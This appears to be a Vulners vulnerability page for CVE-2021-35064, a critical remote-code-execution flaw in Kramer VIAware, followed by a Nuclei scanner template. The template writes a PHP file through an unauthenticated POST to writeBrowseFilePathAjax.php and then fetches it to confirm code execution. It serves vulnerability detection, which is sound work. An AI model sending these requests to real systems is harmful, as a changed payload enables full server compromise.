| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Kramer VIAware - Remote Code Execution Exploit | 7 Apr 202200:00 | – | zdt | |
| Exploit for Improper Privilege Management in Kramerav Viaware | 2 Jun 202202:19 | – | githubexploit | |
| CVE-2021-35064 | 12 Jul 202112:15 | – | attackerkb | |
| CVE-2021-35064 | 13 Jul 202213:02 | – | circl | |
| VIAware 安全漏洞 | 12 Jul 202100:00 | – | cnnvd | |
| Unspecified Vulnerability in VIAware | 15 Jul 202100:00 | – | cnvd | |
| CVE-2021-35064 | 12 Jul 202111:09 | – | cve | |
| CVE-2021-35064 | 12 Jul 202111:09 | – | cvelist | |
| Kramer VIAware - Remote Code Execution (RCE) (Root) | 7 Apr 202200:00 | – | exploitdb | |
| Kramer VIAware - Remote Code Execution | 10 Jul 202603:01 | – | nuclei |
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html |
| kramerav | www.kramerav.com/us/product/viaware |
| exploit-db | www.exploit-db.com/exploits/50856 |
| write-up | www.write-up.github.io/kramerav/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2021-35064 |
id: CVE-2021-35064
info:
name: Kramer VIAware - Privilege Escalation and Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Kramer VIAware, all tested versions, allow privilege escalation and remote code execution due to misconfigured sudo permissions. Attackers can execute arbitrary system commands remotely if the web interface is accessible, due to vulnerabilities in the handling of privileged operations through ajaxPages/writeBrowseFilePathAjax.php and improper sudoers configurations.
impact: |
Unauthenticated attackers can execute arbitrary PHP code via file upload, leading to complete server compromise and control over the Kramer VIAware system.
remediation: |
Apply the latest firmware update provided by Kramer to fix misconfigured sudoers permissions and ensure proper validation in the web interface.
reference:
- http://packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html
- https://www.kramerav.com/us/product/viaware
- https://www.exploit-db.com/exploits/50856
- https://write-up.github.io/kramerav/
- https://nvd.nist.gov/vuln/detail/CVE-2021-35064
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-35064
cwe-id: CWE-269
epss-score: 0.70753
epss-percentile: 0.9932
cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: kramerav
product: viaware
fofa-query: icon_hash="1521468900"
tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln
variables:
useragent: "{{rand_base(6)}}"
http:
- raw:
- |
POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
- |
GET /{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 490a00463044022039caa3ba1007d6a7e08706ec8a6f36ee8b14267ef95ba1b228ea970a511fa085022034aca6192962fa0b833d95a6db57e0b705fbdb3c4fd6c68e33536fd990373609:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation